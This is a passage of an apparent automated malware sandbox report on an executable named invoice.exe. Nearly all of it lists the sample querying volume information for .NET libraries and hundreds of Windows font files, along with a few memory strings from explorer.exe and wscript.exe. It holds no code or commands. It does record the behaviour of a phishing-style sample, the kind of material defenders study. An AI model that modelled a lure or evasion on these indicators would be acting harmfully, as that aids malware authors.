Source: explorer.exe, 00000004.00000000.246523611.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000004.00000002.491483323.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000004.00000002.491483323.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Users\user\Desktop\invoice.exe VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
